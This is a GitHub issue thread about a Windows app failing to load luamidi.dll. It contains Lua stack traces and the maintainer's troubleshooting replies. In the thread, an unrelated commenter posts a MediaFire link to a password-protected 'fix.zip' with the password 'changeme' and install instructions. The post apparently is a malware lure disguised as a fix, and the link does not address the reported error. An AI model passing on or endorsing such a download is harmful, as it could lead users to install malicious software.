### ISSUE TITLE
luamidi.dll error

### ISSUE THREAD

**Issue by l4zr** [immortalx74/vr_midi_drummer#3]
upon opening vrmd.exe, the app only returns this message:

`
Error

error loading module 'luamidi' from file '.\luamidi.dll':
	The specified module could not be found.

Stack:
[C]: in function 'require'
app.lua:3: in main chunk
[C]: in function 'require'
main.lua:1: in main chunk
[C]: in function 'require'
boot.lua:103: in function <boot.lua:4>
[C]: in function 'xpcall'
`

luamidi.dll is in the correct location, I have made sure vc redist is installed and windows defender is not interfering. 

when deleting luamidi.dll, a different error is returned:

`
Error

app.lua:3: module 'luamidi' not found:
	no field package preload['luamidi']
	no file '.\luamidi.lua'
	no file 'vrmd\lua\luamidi.lua'
	no file 'vrmd\lua\luamidi\init.lua'
	no file '.\luamidi.dll'
	no file 'vrmd\luamidi.lua'
	no file 'vrmd\loadall.dll'

Stack:
app.lua:3: in main chunk
[C]: in function 'require'
main.lua:1: in main chunk
[C]: in function 'require'
boot.lua:103: in function <boot.lua:4>
[C]: in function 'xpcall'
`
So it is finding the file, but something goes wrong with loading its module.

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by immortalx74** [comment]
Although it works on my end it's probably because of the wrong way I'm handling paths.
I just uploaded a release with a potential fix. Please let me know if it works and thanks for the report.

**Comment by l4zr** [comment]
the error message is only slightly different now. (app.lua:3 became app.lua:6)

`Error

error loading module 'luamidi' from file '.\luamidi.dll':
The specified module could not be found.

Stack:
[C]: in function 'require'
app.lua:6: in main chunk
[C]: in function 'require'
main.lua:1: in main chunk
[C]: in function 'require'
boot.lua:103: in function <boot.lua:4>
[C]: in function 'xpcall'`

but thanks for responding

**Comment by immortalx74** [comment]
Hmm I just tried it in another machine and it works there too. You're extracting the zip, right?

**Comment by immortalx74** [comment]
Closing this for now since it seems to work in every other PC I tried.
